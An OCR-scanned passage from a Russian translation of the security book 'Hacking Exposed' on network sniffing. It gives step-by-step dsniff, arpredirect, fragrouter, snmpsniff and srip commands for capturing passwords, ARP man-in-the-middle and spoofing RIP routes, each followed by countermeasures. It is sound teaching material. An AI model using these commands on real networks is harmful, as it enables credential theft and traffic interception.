Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей - готовые решения
Подождите немного. Документ загружается.
сти. Однако, к сожалению, сети Ethernet с множественным доступом весьма распростра-
нены в
настоящее
время и, похоже, вряд ли исчезнут в обозримом будущем.
Между тем уже довольно давно существует технология Ethernet, построенная на прин-
ципе коммутации пакетов, которая далеко позади оставляет традиционную технологию
Ethernet. Технология коммутации пакетов основывается на использовании большой табли-
цы адресов MAC (Media Access Control — управление доступом к компонентам среды).
При использовании
МАС-адресов
данные отправляются с помощью специального алго-
ритма, реализованного в виде быстродействующей микросхемы, непосредственно получа-
телю этих данных и никому более (за исключением лишь некоторых особых случаев).
Однако и в коммутируемых сетях также имеется возможность перехвата пересы-
лаемых пакетов. Примером такого устройства могут быть коммутаторы Catalyst ком-
пании Cisco, имеющие средства поддержки технологии SPAN (Switched Port Analyzer).
Перенаправив определенные порты или виртуальные локальные сети
(VLAN
— Virtual
Local Area Networks) на заданный порт, администратор может перехватывать пакеты
так, как если бы они передавались по традиционной сети с множественным доступом.
В настоящее время этот прием часто используется в системах выявления вторжений
(IDS — Intrusion Detection System) с целью обеспечения возможности прослушивания
передаваемого потока данных и выявления нарушений безопасности. Более подробная
информация о технологии SPAN приведена по адресу
http://www.cisco.com/
univercd/cc/td/doc/product/lan/cat5000/rel_4_5/config/span.htm.
Еще более опасной для коммутируемых сетей оказалась технология, реализованная
Дагом Сонгом (Dug Song) в его программе-анализаторе dsniff. Эта программа по-
зволяет захватывать трафик коммутируемой сети, полностью перенаправляя его с за-
данного узла на узел, на котором она установлена. Такая технология достаточно про-
ста и способна разрушить традиционное мнение о том, что сеть с коммутацией паке-
тов обеспечивает достаточно высокий уровень безопасности.
Определение типа сети
Определить, к какому типу относится используемая вами сеть (т.е. к сетям с множе-
ственным доступом или же к сетям с коммутацией пакетов), очень просто. Используя
простейшую программу перехвата пакетов, например
tcpdump
(для NT или UNIX), вы
получите все данные, необходимые для того, чтобы сделать однозначное заключение.
В коммутируемых сетях вы сможете увидеть только трафик широковещательных
сообщений (broadcast traffic), трафик групповых сообщений (пакеты, передаваемые
группе узлов; multicast traffic), а также потоки данных, отправляемые и получаемые
вашим компьютером. В показанном ниже примере сеанса работы утилиты tcpdump,
запущенной в коммутируемой сети, видно, что утилита перехватила только циркуляр-
ную рассылку по протоколу SAP (Service Advertisement Protocol) и пакеты, отправляе-
мые по протоколу разрешения адресов (ARP — Address Resolution Protocol).
20:20:22.530205
0:80:24:53:ае:bd
>
1:80:с2:0:0:0
sap 42 ui/C len=43
0000 0000 0080 0000 8024
53ае
dlOO
0000
0080 0000 8024
53ае
d!80
OdOO
0014 0002
OOOf
0000 0000 0000 0000
00
20:20:24.610205
0:80:24:53:ae:bd
>
1:80:c2:0:0:0
sap 42 ui/C len=43
0000
0000
0080
0000
8024
53ae
dlOO
0000
0080 0000 8024
53ae
d!80
OdOO
0014 0002
OOOf
0000 0000 0000 0000
00
20:20:25.660205
arp
who-has
172.29.11.100
tell
172.29.11.207
20:20:26.710205
0:80:24:53:ae:bd
>
1:
80:c2
:
0:0:0
sap 42 ui/C len=43
0000
0000
0080
0000
8024
53ae
dlOO
0000
0080 0000 8024
53ae
d!80
OdOO
0014 0002
OOOf
0000 0000 0000 0000
00
Глава 10. Сетевые устройства
473
20:20:28.810205
0:80:24:53:ae:bd
>
1:80:с2:0:0:0
sap 42
ui/C
len=43
0000 0000 0080 0000 8024 53ае
dlOO
0000
0080 0000 8024 53ае
d!80
OdOO 0014 0002
OOOf 0000 0000 0000 0000 00
20:20:30.660205 arp who-has
172.29.11.100
tell
172.29.11.207
В то же время в сетях с множественным доступом к передающей среде вы увидите
все типы данных, пересылаемых по сети разными узлами. Например, в показанном
ниже фрагменте сеанса работы утилиты
tcpdump
легко обнаружить потоки данных,
предназначенные другим компьютерам (естественно, такого рода информация гораздо
интереснее для злоумышленников, чем приведенная выше).
20:25:37.640205
192.168.40.66.23
>
172.29.11.207.1581:
Р 31:52(21)
ack 40 win 8760 (DF) (ttl 241, id 21327)
20:25:37.640205
172.29.11.207.1581
>
192.168.40.66.23:
P 40:126(86)
ack 52 win 32120 (DF) [tos 0x10] (ttl 64, id 4221)
20:25:37.780205
192.168.40.66.23
>
172.29.11.207.1581:
P 52:73(21)
ack 126 win 8760 (DF) (ttl
241,id
21328)
20:25:37.800205
172.29.11.207.1581
>
192.168.40.66.23:
. ack 73
win 32120 (DF) [tos 0x10] (ttl
64,id
4222)
20:25:37.960205
192.168.40.66.23
>
172.29.11.207.1581:
P 73:86(13)
ack 126 win 8760 (DF) (ttl
241,id
21329)
20:25:37.960205
172.29.11.207.1581
>
192.168.40.66.23:
P 126:132(6)
ack 86 win 32120 (DF) [tos 0x10] (ttl 64, id 4223)
20:25:38.100205
192.168.40.66.23
>
172.29.11.207.1581:
P 86:89(3)
ack 132 win 8760 (DF) (ttl 241, id 21330)
20:25:38.120205
172.29.11.207.1581
>
192.168.40.66.23:
. ack 89
win 32120 (DF) [tos 0x10] (ttl
64,id
4224)
Пароли
на
блюдечке:
dsnif
f
Популярность
Простота
Опасность
Степень риска
9
8
10
9
Конечно, с помощью утилиты tcpdump можно без проблем определить тип ис-
пользуемой сети, однако что вы скажете о получении главных "драгоценностей" ком-
пьютерного мира — паролей? Для этих целей можно приобрести "необъятный" по
предоставляемым возможностям профаммный пакет
SnifferPro
от компании Network
Associates или воспользоваться более дешевыми средствами, например CaptureNet,
разработанным Лаврентием
Никулой
(Laurentiu
Nicula). Однако лучше всего прибег-
нуть к программе Дага Сонга (Dug Song). Он разработал одно из наиболее сложных
средств перехвата паролей — профамму dsnif f.
Зачастую можно встретить приложения, в которых в качестве паролей используется
незашифрованный текст. Кроме того, подобная конфиденциальная информация хра-
нится далеко не в лучшем месте. Примерами таких служб и приложений могут послу-
жить
следующие:
FTP, telnet,
POP,
SNMP,
HTTP, NNTP,
ICQ, IRC,
Socks,
NFS
(сетевая
файловая система
—
Network
File
System),
mountd,
rlogin,
IMAP,
AIM,
XI1,
CVS, Napster,
Citrix
ICA,
pcAnywhere,
NAI
Sniffer, Microsoft SMB и Oracle SQL. В боль-
шинстве перечисленных выше приложений либо используются незашифрованные поль-
зовательские имена и пароли, либо применяются упрощенные алгоритмы шифрования,
сокрытия и декодирования, которые нельзя рассматривать как серьезную
префаду
для
взломщиков. Именно в этом случае можно ощутить всю мощь
профаммы
dsnif f.
474 Часть III. Хакинг сетей
С помощью программы dsniff можно прослушать трафик любого сетевого сег-
мента независимо от того, относится ли он к сети с множественным доступом или же
к сети с коммутацией пакетов. Эту программу можно получить по адресу
http://
naughty.monkey.org/~dugsong/dsniff/,
а затем выполнить ее компиляцию. С Web-
узла компании еЕуе
(http://www.eeye.com)
можно также загрузить и попробовать в
действии версию этой программы для платформы Win32. В этом случае потребуется ус-
тановить также и библиотеку WinPcap, которая, однако, может
вызвать
некоторые про-
блемы в системах с
конфликтующими
драйверами. Эту библиотеку можно найти по ад-
ресу
http://netgroup-serv.polito.it/winpcap/install\Default.htm.
При запуске программы dsniff в системе Linux будут получены все незашифро-
ванные или простые пароли сетевого сегмента.
[root@mybox
dsniff-1.8]
dsniff
05/21/00 10:49:10 bob ->
unix-server
(ftp)
USER bob
PASS
dontlook
05/21/00 10:53:22 karen
->
lax-cisco
(telnet)
karen
supersecret
05/21/00 11:01:11 karen -> lax-cisco
(snmp)
[version 1]
private
Кроме средства перехвата паролей dsniff, в состав пакета входят разнообразные сред-
ства поиска других слабых мест, такие как
mailsnarf
и webspy.
mailsnarf
представляет
собой небольшое приложение, позволяющее собирать все почтовые сообщения и отобра-
жать их содержимое на экране, как если они были написаны вами
лично,
webspy — это
мощная утилита, которая окажется полезной, если требуется определить, какие страницы в
Web посетили пользователи. При этом в Web-броузере автоматически будут отображаться
Web-страницы, которые были просмотрены определенным пользователем.
[root]#
mailsnarf
From
stu@hackingexposed.com
Mon
May 29 23:19:10 2000
Message-ID:
001701bfca02$790cca90$6433a8cO@foobar.com
Reply-To: "Stuart
McClure"
stu@hackingexposed.com
From:
"Stuart
McClure"
stu@hackingexposed.com
To: "George Kurtz"
george@hackingexposed.com
References:
002201bfc729$7d7ffeVO$ab8dOb!8@JOC
Subject:
Re:
conference
call
Date: Mon, 29 May 2000 23:44:15 -0700
MIME-Version:
1.0
Content-Type:
multipart/alternative;
boundary="
=_NextPart_000__0014_01BFC9C7.CC970F30"
X-Priority: 3
X-MSMail-Priority:
Normal
X-Mailer:
Microsoft Outlook Express
5.00.2919.6600
X-MimeOLE: Produced By Microsoft
MimeOLE
V5.00.2919.6600
This is a multi-part message in MIME format.
=_NextPart_000_0014_01BFC9C7.CC970F30
Content-Type:
text/plain;
charset="iso-8859-1"
Глава 10. Сетевые устройства 475
Content-Transfer-Encoding:
quoted-printable
Have you heard the latest one about
the...
[содержимое сообщения]
- Stu
Чтение почтовых сообщений ваших соседей может показаться забавным за-
нятием, однако не забывайте о том, что подобные действия вряд ли можно
назвать законными.
О
Контрмеры:
защита
от
dsnif
£
Традиционным
способом защиты от перехвата незашифрованных паролей является
переход от сетевой топологии Ethernet с множественным доступом к сети с коммута-
цией пакетов. Однако как вы узнали из предыдущих разделов, такая мера практически
не способна предотвратить атаки с применением программы
dsnif
f.
В этом случае ко всему сетевому трафику лучше всего применить один из алгоритмов
шифрования. Воспользуйтесь преимуществами SSH для
туннелирования
всего трафика
или возможностями средств, в которых реализованы алгоритмы шифрования по
открыто-
му ключу
(PKI
— Public Key Infrastructure), например продуктами компании Entrust Tech-
nologies. Это позволит выполнить сквозное шифрование всего потока сетевых данных.
Анализ пакетов на коммутаторе сети
На первый взгляд кажется, что для повышения скорости и уровня безопасности можно
просто добавить в сеть новый коммутатор. Если вы считаете, что это позволит удержать
любознательных пользователей от прослушивания интенсивного сетевого
трафика,
то та-
кая позиция может вызвать лишь улыбку. Неужели вы думаете, что новый коммутатор
способен разрешить все существующие проблемы? Подумайте хорошенько еще раз.
Протокол ARP (Address Resolution Protocol — протокол разрешения адресов,
RFC 826) обеспечивает динамическое преобразование 32-битовых IP-адресов в 48-
битовые физические адреса
'сетевых
устройств. Когда узлу требуется обратиться к со-
седним устройствам из той же сети (включая шлюз, используемый по умолчанию), он
рассылает широковещательные сообщения ARP для поиска физического адреса тре-
буемого узла. Соответствующий узел отвечает на запрос ARP, сообщая свой физиче-
ский адрес, после чего и начинается взаимодействие.
К сожалению, трафик ARP с исходного узла можно перенаправить на компьютер
взломщика. Это можно осуществить даже в сетях с коммутацией пакетов. Перехва-
ченные сообщения можно просмотреть, используя анализатор сетевых пакетов, а за-
тем передать их в реальный пункт назначения. Этот сценарий известен как атака с
применением "третьего среднего" (man in the middle). Такой подход оказывается от-
носительно простым. Рассмотрим его реализацию на примере.
°-v.'."
Перенаправление ARP
Популярность
Простота
Опасность
Степень риска
4
2
8
5
476 Часть III.
Хакинг
сетей
В рассматриваемом примере три компьютера соединены с сетевым коммутатором.
Система crush является шлюзом, заданным по умолчанию, с IP-адресом
10.1.1.1.
Компьютер
shadow—
это исходный узел с IP-адресом
10.1.1.18.
Система twister
представляет собой компьютер взломщика, который будет выполнять роль "третьего-
среднего". Его
IP-адрес—
Ю.1.1.19.
Для подготовки нападения на узле twister
запустим утилиту
arpredirect,
входящую
в
состав пакета
dsniff
Дага Сонга
(Dug
Song,
http://www.monkey.org/-dugsong/dsniff/).
Эта утилита позволит нам пере-
хватывать пакеты, передаваемые исходным узлом по сети другому узлу, который
обычно представляет собой шлюз, используемый по умолчанию (рис. 10.7).
3) Передайте ложный пакет
ARP с узла ВОВ, на котором
запущена утилита arpredirect
4) Теперь весь трафик
с узла SALLY предназначенный
для
узла,расположенного
за
пределами используемого
SALLY по умолчанию шлюза, сначала ВОВ
10.1.1.12 передается на узел ВОВ, что 10.1.1.212
обеспечивает возможность
перехвата пакетов на коммутаторе
1)
Активизируйте режим
передачи IP-пакетов
на уровне ядра или
запустите утилиту,
такую как
fragrouter
2) Запустите свой
любимый анализатор
пакетов
Коммутатор
Cisco Catalyst
Шлюз, используемый
по умолчанию
10.1.1.1
Рис. 10.7. Перехват пакетов ARP и прослушивание коммутаторов оказывается по-
лезным независимо от сетевой архитектуры
| Перед тем как приступить к изучению этого подхода в собственной сети, обсу-
дите этот вопрос с сетевым администратором. Если на вашем коммутаторе
включен режим защиты портов, то это может привести к блокированию всех
пользователей, обратившихся к нему.
Не забывайте о том, что все компьютеры соединены с коммутатором, и у нас име-
ется возможность просматривать лишь широковещательный сетевой трафик. Однако,
как
показано ниже,
с
помощью утилиты
arpredirect
мы
сможем просмотреть весь
поток сообщений, передаваемый между узлами shadow и crush.
Глава 10. Сетевые
устройства
477
На узле
twister
выполним следующую команду.
[twister] ping crush
PING
10.1.1.1
from
10.1.1.19
:
56(84)
bytes
of
data.
64
bytes
from
10.1.1.1:
icmp_seq=0
ttl=128
time=1.3
ms
[twister] ping shadow
PING
10.1.1.18
from
10.1.1.19
:
56(84)
bytes
of
data.
64
bytes
from
10.1.1.18:
icmp_seq=0
ttl=255
time=5.2
ms
В
результате
в
таблицу
ARP
компьютера
twister
будет
помещен физический
ад-
рес соответствующих узлов, которые понадобятся при запуске утилиты arpredirect.
[twister]
arpredirect
-t
10.1.1.18
10.1.1.1
intercepting
traffic
from
10.1.1.18
to
10.1.1'.
1
(
Л
С
to
exit)...
После выполнения этой команды весь поток сообщений, передаваемый с узла
shadow на используемый по умолчанию шлюз crush, будет перенаправляться на ком-
пьютер взломщика,
twister.
На
этом узле необходимо
также
включить режим после-
дующей передачи IP-пакетов (forwarding IP traffic), чтобы он функционировал в качестве
маршрутизатора и после перехвата сообщений с узла shadow перенаправлял их на узел
crush. На компьютере twister режим передачи пакетов можно активизировать на
уровне ядра, однако делать этого не рекомендуется, поскольку в этом случае могут пере-
даваться также пакеты ICMP, что может привести к нарушению всего процесса. Вместо
этого воспользуемся утилитой fragrouter
(http://packetstormsecurity.org/)
и
активизируем обычный режим передачи IP-пакетов с помощью следующей команды.
[twister] fragrouter
-Bl
fragrouter:
base-1:
normal IP forwarding
10.1.1.18.2079
> 192.168.20.20.21: S
592459704:592459704(0)
10.1.1.18.2079 > 192.168.20.20.21: P
592459705:592459717(12)
10.1.1.18.2079 > 192.168.20.20.21: . ack 235437339
10.1.1.18.2079 > 192.168.20.20.21: P
592459717:592459730(13)
<вывод
сокращен>
И наконец, на узле twister нужно активизировать простую программу анализа паке-
тов, чтобы иметь возможность перехватывать все ценные данные. Для получения более
подробной информации об анализаторах сетевых пакетов читайте главы 6,
"Хакинг
Windows 2000", и 8, "Хакинг UNIX".
[twister]
linsniff
Linux Sniffer Beta
v.99
Log opened.
[SYN]
(slot 1)
10.1.1.18
=>
192.168.20.20 [21]
USER
saumil
PASS
lamDaman!!
PORT
10,1,1,18,8,35
NLST
QUIT
[SYN]
(slot 1)
10.1.1.18 => 192.168.20.20 [110]
USER
saumil
PASS
lamOwned
[FIN]
(1)
Теперь посмотрим,
что же
произойдет.
После
запуска утилиты
arpredirect
узел
twister
будет
передавать
фальшивые
ARP-ответы
узлу shadow
и
выдавать
себя
за
узел
478 Часть III. Хакинг сетей
crush. Узел shadow успешно обновит свою таблицу
ARP
и поместит в нее "новый" фи-
зический адрес узла crush. После этого пользователь компьютера shadow начнет сеанс
FTP и POP с узлом
192.168.20.20.
Однако вместо передачи пакетов на компьютер
crush, реальный используемый по умолчанию шлюз, узел shadow будет введен в заблу-
ждение, поскольку в его таблицу ARP были внесены соответствующие изменения. Через
узел
twister
весь трафик будет перенаправляться
на
узел
192.168.20.20,
поскольку
с
помощью утилиты f ragrouter мы активизировали режим перенаправления IP-пакетов.
Другими словами, узел
twister
будет играть роль маршрутизатора.
В рассмотренном примере мы просто перенаправили все сетевые пакеты, переда-
ваемые с узла shadow на узел crush. Однако вполне возможно перенаправить весь
трафик
на
узел
twister,
опустив параметр
-t.
[twister]
azpredirect
10.1.1.1
intercepting traffic from LAN to 10.1.1.1
(
Л
С
to
exit)...
Нетрудно догадаться, что в сети с интенсивным трафиком это приведет к настоя-
щему хаосу.
Если вы не очень хорошо знакомы с системой UNIX, то у вас может возникнуть
закономерный вопрос: можно
ли
утилиту
arpredirect
использовать
в
системе Win-
dows.
К
сожалению, утилита
arpredirect
не
перенесена
на эту
платформу,
но
ничто
не мешает нам воспользоваться альтернативными вариантами. Для некоторых комму-
таторов можно установить сетевое подключение к порту простого концентратора. За-
тем к этому концентратору можно подключить компьютер с системой UNIX, на кото-
ром
запущена утилита
arpredirect,
а
также компьютер
под
управлением Windows,
на котором запущена выбранная вами программа-анализатор. Система UNIX будет
успешно перенаправлять весь трафик, тогда как система Windows будет его перехва-
тывать на локальном концентраторе.
О Контрмеры: предотвращение перенаправления ARP
Как вы увидели в предыдущем разделе, не составляет никаких проблем генериро-
вать ложные ответы
ARP
и модифицировать таблицу ARP на большинстве узлов ло-
кальной сети. Где это только возможно, задавайте статические записи таблицы ARP,
особенно на важных системах. Стандартный прием заключается в задании статиче-
ских записей ARP,
определяющих
взаимодействие брандмауэра и пограничных мар-
шрутизаторов. Это можно реализовать следующим образом.
[shadow]
arp
-s crush
00:00:С5:74:ЕА:ВО
[shadow] arp
-a.
crush (10.1.1.1) at
00:00:05:74:ЕА:ВО
[ether] PERM on ethO
Обратите внимание
на
флаг
PERM,
который является признаком статической записи ARP.
Использование постоянных статических маршрутов для внутренних сетевых узлов являет-
ся не самой распространенной практикой в мире. Поэтому можно применять утилиту
arpwatch
(ftp://ftp.ee.lbl.gov/arpwatch-2.la6.tar.gz),
предназначенную для от-
слеживания пар
ARP-aflpec/IP-aflpec
и уведомления о любых обнаруженных изменениях.
Для активизации этого режима запустите утилиту arpwatch, указав при этом ин-
терфейс, мониторинг которого нужно осуществлять.
[crush] arpwatch -i
rlO
Как видно из следующего примера, утилита arpwatch обнаружила работу утилиты
arpredirect
и
поместила соответствующую запись
в
журнал
/var/log/messages.
May 21 12:28:49 crush: flip flop 10.1.1.1
0:50:56:bd:2a:f5
(0:0:c5:74:ea:bO)'
Глава 10. Сетевые устройства 479
Поскольку подобную деятельность выявить не очень легко, то такой мониторинг
будет полезен при ее идентификации.
V
О
/
^
I
snmpsniff
Популярность
Простота
Опасность
Степень риска
10
8
1
6
Если ваш компьютер находится в сегменте сети с множественным доступом, то со-
всем неплохо ее "прослушать" и узнать, что же в ней происходит. Воспользуйтесь
мощ-
ным анализатором пакетов
SnifferPro
компании Network Associates или запустите утилиту
snmpsnif
f, разработанную
Нуно
Леитао
(Nuno
Leitao,
nuno.leitao@convex.pt),
а за-
тем посмотрите, какую информацию вы получили.
Утилита snmpsnif f — это прекрасное средство для перехвата не только строк дос-
тупа, но и запросов SNMP. Достаточно запустить ее с указанными ниже параметрами,
чтобы практически гарантированно получить нечто интересное.
[rootgkramer
snmpsniff-0.9b]#
./snmpsniff.sh
snmpsniffer:
listening
on
ethO
(05:46:12)
172.31.50.100(secret)-»
172.31.50.2
(ReqID:1356392156)
GET:
<.iso.org.dod.internet.mgmt.mib-2.system.1.0>
(NULL)
=
NULL
(05:46:12)
172.31.50.2(secret)-»
172.31.50.100
(ReqID:1356392156)
RESPONSE
(Err:0):
<.iso.org.dod.internet.mgmt.mib-2.system.1.0>
(Octet
String)
=
OCTET
STRING-
(ascii):
Cisco
Internetwork
Operating
System
Software
..IOS
(tm)
3000
Software
(IGS-I-L),
Version
11.0(16),
RELEASE
SOFTWARE
(fcl)..Copyright
(c)
1986-1997
by
cisco
Systems,
Inc...Compiled
Tue
24-Jun-97
12:20 by jaturner
Как видно из приведенного выше
фрагме'нта,
злоумышленнику удалось узнать од-
ну из
строк доступа
(secret),
которая может оказаться
строкой
доступа, позволяю-
щей не только получать, но и записывать данные на маршрутизатор
172.31.50.2
с
помощью SNMP. Теперь злоумышленник сможет получить доступ не только к уст-
ройствам вашей сети, но и попробовать взломать еще одну "жертву" — компьютер с
IP-адресом
172.31.50.100.
О Контрмеры: защита трафика SNMP
Одна из защитных мер, позволяющих предотвратить перехват трафика SNMP, за-
ключается в его шифровании. В обеих версиях этого протокола,
SNMPv2
и
SNMPvS,
имеется возможность применения алгоритмов шифрования и стандарта DES для шиф-
рования конфиденциальной информации. Альтернативный подход заключается в реали-
зации защищенного канала на базе частной виртуальной сети (VPN — Virtual Private
Network). При использовании клиентского программного обеспечения VPN, разрабо-
танного компанией Entrust
(http://www.entrust.com)
или компанией
NortelNetworks
(http://www.nortelnetworks.com),
гарантируется шифрование трафика между кли-
ентским узлом и концом канала
VPN.
480 Часть III.
Хакинг
сетей
«•V"
Ложные пакеты RIP
Популярность
Простота
Опасность
Степень риска
4
4
10
6
После успешной идентификации маршрутизаторов вашей сети опытный взломщик
наверняка предпримет попытку найти те из них, которые поддерживают протокол
маршрутизации RIP (Routing Information Protocol) версии 1 (RFC 1058) или 2 (RFC
1723). Почему? Дело в том, что с его помощью легко сгенерировать ложные пакеты.
Объясняется это следующими причинами.
Т Протокол RIP базируется на протоколе
UDP
(порт UDP 520) и, таким образом,
также не требует наличия открытого соединения (connectionless). Другими сло-
вами, соответствующий пакет будет принят от любого узла, несмотря на то, что
такой пакет никогда не был отправлен.
• В протоколе RIP версии 1 отсутствует механизм аутентификации, что позволяет
любому узлу отправить пакет маршрутизатору
RIP
и получить требуемые данные.
А Протокол RIP версии 2 поддерживает упрощенную аутентификацию, позволяющую
использовать пароли в виде незашифрованного текста длиной 16 байт. Однако, как
теперь вам известно, подобные пароли можно без проблем перехватить.
В результате взломщик может просто отправить маршрутизатору RIP ложные паке-
ты и указать, чтобы пакеты передавались в другую сеть или узел, а не на требуемый
узел. Вот как можно осуществить атаку с помощью ложных пакетов RIP.
1. Идентифицируйте маршрутизатор RIP, который вы планируете атаковать. Для
этого выполните сканирование
UDP-порта
с номером 520.
2. Определите таблицу маршрутизации.
• Если вы находитесь в том же физическом сегменте, что и маршрутизатор, и
можете перехватывать сетевой трафик, то достаточно просто прослушать
широковещательный трафик RIP и получить от
него
всю интересующую
информацию о записях маршрутизации (если вы имеете дело с активным
маршрутизатором RIP) или запросить маршруты (в случае пассивного или
активного маршрутизатора RIP).
• Если вы находитесь на удаленном узле или лишены возможности перехва-
тывать пакеты, то можно воспользоваться простой утилитой rprobe. Запус-
тив эту утилиту в одном окне, можно передать маршрутизатору RIP запрос о
доступных маршрутах.
[root!]
rprobe -v 192.168.51.102
Sending packet
Sent 24
bytes.
• С помощью утилиты
tcpdump
(или другой программы перехвата пакетов),
запущенной в другом окне, можно прочитать ответ маршрутизатора.
Этот фрагмент результата, полученного с помощью программы
SnifferPro
компании Network Associ-
ates, может отличаться от ваших результатов в зависимости от используемого анализатора пакетов.
Глава 10. Сетевые устройства 481
RIP
Header
Routing data frame 1
Address
family
identifier = 2 (IP)
IP address = [10.42.33.0]
Metric = 3
Routing data frame 2
Address family identifier = 2 (IP)
IP address = [10.45.33.0]
Metric = 3
Routing data frame 2
Address family identifier = 2 (IP)
IP address =
[10.45.33.0]
Metric = 1
3. Определите наилучшее направление атаки. Тип атаки ограничивается лишь
фантазией взломщика, однако в данном примере мы перенаправим весь трафик
на определенный узел через наш собственный компьютер, чтобы можно было
проанализировать все пакеты и, не исключено, извлечь из них информацию о
паролях. Для этого на маршрутизатор RIP
(192.168.51.102)
необходимо доба-
вить следующий маршрут.
IP-адрес
=10.45.33.10
Маска подсети
=255.255.255.255
Шлюз = 172.16.41.200
Метрика = 1
4.
Добавьте маршрут.
Для
этого
с
помощью утилиты
srip
передайте
маршрутизатору ложный пакет со статическим маршрутом.
[root*]
srip
-2
-n
255.255.255.255
172.16.41.200
192.168.51.102
10.45.33.10 1
5. Теперь все пакеты, предназначенные для узла
10.45.33.1
(который может
быть любым сервером, содержащим конфиденциальную информацию), будут
перенаправляться на наш компьютер
(172.16.41.200)
для дальнейшей переда-
чи. Конечно, для дальнейшей передачи этих пакетов необходимо воспользо-
ваться утилитой f ragrouter или любым другим средством уровня ядра.
Утилита fragrouter
[root#]
./fragrouter
-Bl
Передача пакетов на уровне ядра
[root*]
vi
/proc/sys/net/ipv4/ip_forward
(измените 0 на 1)
6. Установите свой любимый анализатор пакетов для системы Linux (например,
программу dsniff), а затем приступите к просмотру "на лету" имен пользова-
телей и паролей.
Более подробную информацию об использовании ложных пакетов RIP можно по-
лучить по адресу
http://www.technotronic.com/horizon/ripar.txt.
482 Часть III. Хакинг сетей